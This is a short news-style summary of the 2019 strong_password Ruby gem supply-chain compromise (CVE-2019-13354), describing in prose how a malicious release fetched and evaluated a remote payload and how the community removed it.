The strong_password Ruby gem has been found to have a remote code execution vulnerability, CVE-2019-13354, which allows attackers to publish malicious versions of the gem and compromise account access rights. The vulnerable version was published on Rubygems.org six months after the last release with no source code changes. An attacker exploited this by publishing a malicious 0.0.7 version that triggers when an application is running in production, fetching further payload from pastebin.com to evaluate it, allowing remote command execution and providing the URL of the running application. The Ruby gems community quickly responded and removed the malicious version and assigned a CVE. This incident highlights the risks of supply-chain attacks and the importance of monitoring dependencies and taking swift action when vulnerabilities are discovered.